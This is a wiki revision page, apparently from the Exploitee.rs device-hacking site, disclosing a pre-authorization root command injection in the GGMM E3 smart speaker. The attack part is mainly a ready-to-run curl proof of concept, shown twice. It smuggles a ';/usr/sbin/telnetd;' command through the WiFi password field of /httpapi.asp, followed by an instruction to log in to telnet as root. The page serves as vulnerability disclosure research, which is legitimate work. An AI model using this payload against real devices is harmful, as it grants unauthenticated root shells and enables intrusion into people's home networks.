Difference between revisions of "GGMM E3 Smart Speaker"

From Exploitee.rs
Jump to navigationJump to search
(Created page with "__FORCETOC__ {{Disclaimer}} 120px|left|thumb Category:IOT =GGMM E3 Smart Speaker= "Enjoy the full rich sound by wirelessly streaming your favirote mu...")
 
 
(2 intermediate revisions by 2 users not shown)
Line 10: Line 10:
== Purchase ==
== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA Purchase the GGMM E3 Smart Speaker at Amazon]
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258299&sr=1-1&tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon]


==Pre Auth Root Command Injection==
==Pre-Authorization Root Command Injection==


Target: /httpapi.asp
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.


Proof of Concept:
<pre style="white-space: pre-wrap;">
<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
Line 21: Line 22:


Connect to the telnet service as root
Connect to the telnet service as root
=== Demo ===
{{#ev:youtube|rxtb88qYanI}}

Latest revision as of 00:44, 11 August 2017

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

GGMME3.JPG

GGMM E3 Smart Speaker

"Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly."

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the GGMM E3 Smart Speaker at Amazon

Pre-Authorization Root Command Injection

A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.

Proof of Concept:

curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed

Connect to the telnet service as root

Demo